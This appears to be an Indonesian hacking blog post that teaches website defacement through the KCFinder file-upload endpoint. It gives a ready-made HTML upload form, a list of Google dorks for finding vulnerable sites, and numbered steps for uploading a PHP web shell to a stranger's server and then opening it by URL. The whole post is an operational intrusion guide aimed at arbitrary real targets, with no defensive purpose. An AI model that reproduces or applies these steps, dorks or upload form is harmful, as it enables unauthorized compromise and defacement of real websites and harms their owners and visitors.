Kali ini saya akan memberikan Tutorial Deface Metode Kcfinder.Ok langsung saja kita mulai tutorialnya Yah😊
Siapin dulu Bahannya dibawah ini yah!
Bahan-Bahan :
-akses Internet
-Pc /Hp Android
-script Deface
-Shell
Exploite :
target.com/[path]/kcfinder/upload.php
*Csrf :
<body style="color: #FFFFFF; background-color: #000000">
<center>
<h1>
<font color='Darkviolet'>.::INDONESIA HACKER COMMUNITY::.</font>
</h1>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<form method="POST" action=" pastekan Disini situsTargetnya"enctype="multipart/form-data"><input style="color:lime;background-color:#000000" type="file" name="Filedata" /><button>Serang</button>
</body>
</center>
</form>
Simpan Berektensi .html
*Dork :
inurl:/asset/kcfinder
sites/all/modules/civicrm/packages/kcfinder
inurl:templates/_editor/kcfinder/
inurl:includes/kcfinder/browse.php
inurl:/kcfinder/browse.php
inurl:admin/kcfinder/
inurl:panel/kcfinder/upload/files
inurl:editor/kcfinder/upload
inurl:Kcfinder/upload/files
inurl:/panel/kcfinder/ ext:png
inurl:/admin-panel/kcfinder/upload/
inurl:/assets/admin/kcfinder/upload/
Langkah-Langkah :
1.Kita Dorking dulu di Google Ataupun Browser.
2.Pilih Site target Yang menerut Kamu Vuln.
3.Kemudian Tambahkan upload.php di Belakang Kcfinder.
Jika Ada alert/pesan Unkown Error,Berarti itu Vuln.
Langsung saja salin Url nya jika Vuln.
4.Kemudian Edit csrf Yang sudah kalian copas diatas tadi,lalu Pastekan Url yang vuln tadi ke csrf nya.Simpan csrf nya Berformat .html
5.Lalu buka csrf nya di google atau Browser milik Kamu.
6.Sekarang Kita Tinggal Klik pilih File lalu pilih shell Milik kalian,Kemudian Klik upload.
7.Jika ada Alert/pesan kosong,Berarti kita Berhasil Menanam Shell kita.
8.Sekarang tinggal Panggil Saja shell nya.
Caranya :
target.com/[path]/kcfinder/upload/files/Namashell.php
9.Dan boumm saya telah berhasil menanam shellnya😁
Ok sekian dulu Tutorial Dari saya
Saya mohon maaf jika ada kesalahan ketik
Trimakasih Yah sudah berkunjung di blog sederhana ini😊
*Kurang jelas tutornya?Silakan koment dibawah Yah.